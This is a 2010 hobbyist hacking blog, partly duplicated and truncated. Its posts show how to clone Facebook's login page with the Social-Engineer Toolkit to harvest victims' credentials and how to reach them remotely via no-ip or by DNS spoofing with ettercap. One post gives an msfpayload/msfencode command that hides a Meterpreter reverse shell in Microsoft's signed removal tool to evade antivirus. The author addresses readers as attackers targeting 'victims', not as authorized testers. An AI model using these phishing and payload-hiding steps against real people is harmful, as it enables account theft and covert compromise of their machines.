Hi all this is just a short post .......... To help keep yourselves protected better I recommend AVG 2011 full. In the video I show one reason why you should.....its has an amazing firewall. As demonstrated in the video. I will be making more videos about how AVG is great later on :) enjoy!!
Search Adsense
Custom Search
Thursday 23 December 2010
Wednesday 15 December 2010
How To: Remote Harvest Credentials (no-ip) e.g. Facebook Account Hack
In this post I will first go over whats in the video then I will show you how to edit the config file for SET
BTW in this vid im running ubuntu 10.10 with macbuntu installed
To do this attack online instead of on the local subnet which I showed you last you will need to use a DNS service in the video I use no-ip.com. Just make an account and assign a host name to your ip. this will act as a website URL to your ip with you webserver running on.
In the video I mention something that is different to the setup of the server from the last video and that is the fact I had to enter my ip address this is because I have edited the config file to suit my other preferences and options avalible in the SET script. Which im now about to move onto. For the next load of text I have been lazy and have used the site http://www.social-engineer.org/framework/Computer_Based_Social_Engineering_Tools:_Social_Engineer_Toolkit_(SET) which is the people who made SET. I have just cut some of the relevance stuff out and pasted to this page. But I would encourage a read of the link as it gives a good understanding of how each attack vectors and options work which I wont cover in this post.
Now to edit the config file which is locate at
----------------------------------------------
root@bt:/pentest/exploits/SET/config# ls
mailing_list.txt set_config set_config.save
----------------------------------------------
To edit the set_config type " nano set_config" or replace nano with you preferred text editor nano is mine.
Now for the copy and past :)
----------------------------------------------
Beginning with the Social Engineer Toolkit
The brains behind SET is its configuration file. SET by default works perfect for most people however, advanced customization may be needed in order to ensure that the attack vectors go off without a hitch. First thing to do is ensure that you have updated SET, from the directory:
root@bt:/pentest/exploits/SET# svn update
U src/payloadgen/payloadgen.py
U src/java_applet/Java.java
U src/java_applet/jar_file.py
U src/web_clone/cloner.py
U src/msf_attacks/create_payload.py
U src/harvester/scraper.py
U src/html/clientside/gen_payload.py
U src/html/web_server.py
U src/arp_cache/arp_cache.py
U set
U readme/CHANGES
Updated to revision 319.
root@bt:/pentest/exploits/SET#
Once you’ve updated to the latest version, start tweaking your attack by editing the SET configuration file. Let’s walk through each of the flags:
root@bt:/pentest/exploits/set# nano config/set_config
# DEFINE THE PATH TO METASPLOIT HERE, FOR EXAMPLE /pentest/exploits/framework3
METASPLOIT_PATH=/pentest/exploits/framework3
Looking through the configuration options, you can change specific fields to get a desired result. In the first option, you can change the path of where the location of Metasploit is. Metasploit is used for the payload creations, file format bugs, and for the browser exploit sections.
# SPECIFY WHAT INTERFACE YOU WANT ETTERCAP TO LISTEN ON, IF NOTHING WILL DEFAULT
# EXAMPLE: ETTERCAP_INTERFACE=wlan0
ETTERCAP_INTERFACE=eth0
#
# ETTERCAP HOME DIRECTORY (NEEDED FOR DNS_SPOOF)
ETTERCAP_PATH=/usr/share/ettercap
The Ettercap section can be used when you’re on the same subnet as the victims and you want to perform DNS poison attacks against a subset of IP addresses. When this flag is set to ON, it will poison the entire local subnet and redirect a specific site or all sites to your malicious server running.
# SENDMAIL ON OR OFF FOR SPOOFING EMAIL ADDRESSES
SENDMAIL=OFF
Setting the SENDMAIL flag to ON will try starting SENDMAIL, which can spoof source email addresses. This attack only works if the victim’s SMTP server does not perform reverse lookups on the hostname. SENDMAIL must be installed. If your using BackTrack 4, it is installed by default.
# SET TO ON IF YOU WANT TO USE EMAIL IN CONJUNCTION WITH WEB ATTACK
WEBATTACK_EMAIL=OFF
When setting the WEBATTACK_EMAIL to ON, it will allow you to send mass emails to the victim while utilizing the Web Attack vector. Traditionally the emailing aspect is only available through the spear-phishing menu however when this is enabled it will add additional functionality for you to be able to email victims with links to help better your attacks.
# CREATE SELF-SIGNED JAVA APPLETS AND SPOOF PUBLISHER NOTE THIS REQUIRES YOU TO
# INSTALL ---> JAVA 6 JDK, BT4 OR UBUNTU USERS: apt-get install openjdk-6-jdk
# IF THIS IS NOT INSTALLED IT WILL NOT WORK. CAN ALSO DO apt-get install sun-java6-jdk
SELF_SIGNED_APPLET=OFF
The Java Applet Attack vector is the attack with one of the highest rates of success that SET has in its arsenal. To make the attack look more believable, you can turn this flag on which will allow you to sign the Java Applet with whatever name you want. Say your targeting CompanyX, the standard Java Applet is signed by Microsoft, you can sign the applet with CompanyX to make it look more believable. This will require you to install java’s jdk (in Ubuntu its apt-get install sun-java6-jdk or openjdk-6-jdk).
# AUTODETECTION OF IP ADDRESS INTERFACE UTILIZING GOOGLE, SET THIS ON IF YOU WANT
# SET TO AUTODETECT YOUR INTERFACE
AUTO_DETECT=ON
The AUTO_DETECT flag is probably one of the most asked questions in SET. In most cases, SET will grab the interface you use in order to connect out to the Internet and use that as the reverse connection and IP address. Most attacks need to be customized and may not be on the internal network. If you turn this flag to OFF, SET will prompt you with additional questions on setting up the attack. This flag should be used when you want to use multiple interfaces, have an external IP, or you’re in a NAT/Port forwarding scenario.
# SPECIFY WHAT PORT TO RUN THE HTTP SERVER OFF OF THAT SERVES THE JAVA APPLET ATTACK
# OR METASPLOIT EXPLOIT. DEFAULT IS PORT 80.
WEB_PORT=80
By default the SET web server listens on port 80, if for some reason you need to change this, you can specify an alternative port.
# CUSTOM EXE YOU WANT TO USE FOR METASPLOIT ENCODING, THIS USUALLY HAS BETTER AV
# DETECTION. CURRENTLY IT IS SET TO LEGIT.BINARY WHICH IS JUST CALC.EXE. AN EXAMPLE
# YOU COULD USE WOULD BE PUTTY.EXE SO THIS FIELD WOULD BE /pathtoexe/putty.exe
CUSTOM_EXE=src/exe/legit.binary
When using the payload encoding options of SET, the best option for Anti-Virus bypass is the backdoored, or loaded with a malicious payload hidden in the exe, executable option. Specifically an exe is backdoored with a Metasploit based payload and can generally evade most AV’s out there. SET has an executable built into it for the backdooring of the exe however if for some reason you want to use a different executable, you can specify the path to that exe with the CUSTOM_EXE flag.
# USE APACHE INSTEAD OF STANDARD PYTHON WEB SERVERS, THIS WILL INCREASE SPEED OF
# THE ATTACK VECTOR
APACHE_SERVER=OFF
#
# PATH TO THE APACHE WEBROOT
APACHE_DIRECTORY=/var/www
The web server utilized within SET is a custom-coded web server that at times can be somewhat slow based off of the needs. If you find that you need a boost and want to utilize Apache, you can flip this switch to ON and it will use Apache to handle the web requests and speed your attack up. Note that this attack only works with the Java Applet and Metasploit based attacks. Based on the interception of credentials, Apache cannot be used with the web jacking, tabnabbing, or credential harvester attack methods.
# TURN ON SSL CERTIFICATES FOR SET SECURE COMMUNICATIONS THROUGH WEB_ATTACK VECTOR
WEBATTACK_SSL=OFF
#
# PATH TO THE PEM FILE TO UTILIZE CERTIFICATES WITH THE WEB ATTACK VECTOR (REQUIRED)
# YOU CAN CREATE YOUR OWN UTILIZING SET, JUST TURN ON SELF_SIGNED_CERT
# IF YOUR USING THIS FLAG, ENSURE OPENSSL IS INSTALLED!
#
SELF_SIGNED_CERT=OFF
#
# BELOW IS THE CLIENT/SERVER (PRIVATE) CERT, THIS MUST BE IN PEM FORMAT IN ORDER TO WORK
# SIMPLY PLACE THE PATH YOU WANT FOR EXAMPLE /root/ssl_client/server.pem
PEM_CLIENT=/root/newcert.pem
PEM_SERVER=/root/newreq.pem
In some cases when your performing an advanced social-engineer attack you may want to register a domain and buy an SSL cert that makes the attack more believable. You can incorporate SSL based attacks with SET. You will need to turn the WEBATTACK_SSL to ON. If you want to use self-signed certificates you can as well however there will be an “untrusted” warning when a victim goes to your website.
TWEAK THE WEB JACKING TIME USED FOR THE IFRAME REPLACE, SOMETIMES IT CAN BE A LITTLE SLOW
# AND HARDER TO CONVINCE THE VICTIM. 5000 = 5 seconds
WEBJACKING_TIME=2000
The webjacking attack is performed by replacing the victim’s browser with another window that is made to look and appear to be a legitimate site. This attack is very dependant on timing, if your doing it over the Internet, I recommend the delay to be 5000 (5 seconds) otherwise if your internal, 2000 (2 seconds) is probably a safe bet.
How To: Harvest Credentials e.g. Facebook Account Hacked !
What is SET:
"The Social-Engineer Toolkit (SET) is specifically designed to perform advanced attacks against the human element. SET was designed to be released with the http://www.social-engineer.org launch and has quickly became a standard tool in a penetration testers arsenal. SET was written by David Kennedy (ReL1K) and with a lot of help from the community it has incorporated attacks never before seen in an exploitation toolset. The attacks built into the toolkit are designed to be targeted and focused attacks against a person or organization used during a penetration test."
In the video I walk you through the selections to make to create your fake site ready for your victim.
Without changing the config file the server will run locally on you internal ip for example 192.168.X.X. To get it working on you remote ip you will have to edit your config file which I shall post in my next as it isnt relevant here (my next post is gonna be written straight after this!)
For the Credential Harvester to be successful then you need to clone a site with a username and password login fields e.g. Facebook.
Not much more to say than, the victim connects to the site thinks its lagit logs in and you get the credentials ......the fake site is made to redirect the victim to the proper site after they think they have logged in.
To do this on a local network on the subnet you can use ettercap.dns spoof to spoof your victims into goin to you site. this can be done in the config file and or the ettercap gui/commandline. (edit the config file will be in my next post) DNS spoofing will come soon.
My next post will be about doing this remotely using a DNS service like no-ip.com and ill do a write up off editing the config file.
Any Questions give me a buzz :)
"The Social-Engineer Toolkit (SET) is specifically designed to perform advanced attacks against the human element. SET was designed to be released with the http://www.social-engineer.org launch and has quickly became a standard tool in a penetration testers arsenal. SET was written by David Kennedy (ReL1K) and with a lot of help from the community it has incorporated attacks never before seen in an exploitation toolset. The attacks built into the toolkit are designed to be targeted and focused attacks against a person or organization used during a penetration test."
In the video I walk you through the selections to make to create your fake site ready for your victim.
Without changing the config file the server will run locally on you internal ip for example 192.168.X.X. To get it working on you remote ip you will have to edit your config file which I shall post in my next as it isnt relevant here (my next post is gonna be written straight after this!)
For the Credential Harvester to be successful then you need to clone a site with a username and password login fields e.g. Facebook.
Not much more to say than, the victim connects to the site thinks its lagit logs in and you get the credentials ......the fake site is made to redirect the victim to the proper site after they think they have logged in.
To do this on a local network on the subnet you can use ettercap.dns spoof to spoof your victims into goin to you site. this can be done in the config file and or the ettercap gui/commandline. (edit the config file will be in my next post) DNS spoofing will come soon.
My next post will be about doing this remotely using a DNS service like no-ip.com and ill do a write up off editing the config file.
Any Questions give me a buzz :)
Sunday 5 December 2010
Hide Payload In Trusted EXE to Bypass AV's
This is a video to show you how to hide the Metasploit Meterpreter payload in a trusted exe to help bypass antivirus detection.
Obviously this is useful and this method is very effective
In my demonstration I use the Microsoft Malicious Software Removal Tool (hehe the irony) This is good for the following reasons:
1.Has the Microsoft Signature (helps when trying to go undetected)
2.Asks the user to run in admin mode with the UAC giving use higher privs :)
To keep the payload undetected and hidden from AV's I recommend injecting it into a trusted exe. In the video I use the Microsoft's Software Removal Tool. The good thing about this exe is it works! not all exe's will work so you will have to do some testing. For example the payload might not execute correctly so u will have to test this your self. But the best thing is that the exe from Microsoft asks the user to run as admin which means on windows vista/7 you will be able to get higher privliges and be able to run commands like "schedueleme" shown in my Backdoor video.
./msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT= R|./msfencode -c 5 -e x86/shikata_ga_nai -x /root/ -t exe > /root/
OK so what this code does is
(./msfpayload windows/meterpreter/reverse_tcp LHOST=***.***.***.*** LPORT=***.***.***.***)= the basic metasploit meterpreter payload config
(R)= creates the payload and keeps it RAW without encoding it into an exe for example
(|./msfencode)= pipes the RAW payload into the encode process.
(./msfencode -c 5 -e x86/shikata_ga_nai)= this encodes the payload 5 times with the x86/shikata_ga_nai encoder.
(-x /root/ -t exe > /root/name.exe)= send raw encoded payload and inject it into the trusted exe then with the new file call it name.exe
then execute on victim machine and bingo :)
Obviously this is useful and this method is very effective
In my demonstration I use the Microsoft Malicious Software Removal Tool (hehe the irony) This is good for the following reasons:
1.Has the Microsoft Signature (helps when trying to go undetected)
2.Asks the user to run in admin mode with the UAC giving use higher privs :)
To keep the payload undetected and hidden from AV's I recommend injecting it into a trusted exe. In the video I use the Microsoft's Software Removal Tool. The good thing about this exe is it works! not all exe's will work so you will have to do some testing. For example the payload might not execute correctly so u will have to test this your self. But the best thing is that the exe from Microsoft asks the user to run as admin which means on windows vista/7 you will be able to get higher privliges and be able to run commands like "schedueleme" shown in my Backdoor video.
./msfpayload windows/meterpreter/reverse_tcp LHOST=
OK so what this code does is
(./msfpayload windows/meterpreter/reverse_tcp LHOST=***.***.***.*** LPORT=***.***.***.***)= the basic metasploit meterpreter payload config
(R)= creates the payload and keeps it RAW without encoding it into an exe for example
(|./msfencode)= pipes the RAW payload into the encode process.
(./msfencode -c 5 -e x86/shikata_ga_nai)= this encodes the payload 5 times with the x86/shikata_ga_nai encoder.
(-x /root/
Subscribe to:
Posts (Atom)